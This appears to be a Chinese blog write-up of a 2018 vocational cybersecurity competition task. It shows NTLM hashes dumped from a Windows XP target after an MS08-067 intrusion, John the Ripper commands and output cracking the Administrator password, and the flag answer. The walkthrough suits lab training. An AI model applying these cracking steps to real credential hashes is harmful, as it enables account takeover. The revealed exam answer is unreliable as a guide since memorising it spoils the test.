avatar

jhon破解windowsXP密码

此题来自 “2018年全国职业院校技能大赛中职组“网络空间安全”赛卷一”的 Windows操作系统渗透测试部分

以下使用MSF的08-067攻击进靶机后 DUMP出来的用户名哈希值 administrator:hacker 这是用户名和密码

1
2
Administrator:500:bce739534ea4e445aad3b435b51404ee:5e7599f673df11d5c5c4d950f5bf0157:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  1. 7.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理员的密码作为FLAG提交;(10分)

我们可以使用jhon工具的默认字典对哈希值进行破解 hash.txt 是我将上面的哈希值保存到这个文件的

1
2
3
4
5
6
7
8
john --format=NT hash.txt
root@Kali:~/kjaq# john --format=NT hash.txt
Using default input encoding: UTF-8
Rules/masks using ISO-8859-1
Loaded 4 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Remaining 3 password hashes with no different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
hacker (Administrator)

之后按下crtl+c 因为超级管理出来了 没必要继续破解后面的账户

当我们再次执行john –format=NT hash.txt时 会发现一个情况 即不会显示 administrator的破解结果了

一直处于破解中或者直接结束掉了, 个人认为是:破解结果已经被记忆了 所以自动绕过了对administrator的破解

可以加上–show 参数进行查看

1
2
3
4
5
6
john --format=NT --show hash.txt 
root@Kali:~/kjaq# john --format=NT --show hash.txt
Administrator:hacker:500:bce739534ea4e445aad3b435b51404ee:5e7599f673df11d5c5c4d950f5bf0157:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

2 password hashes cracked, 2 left

评论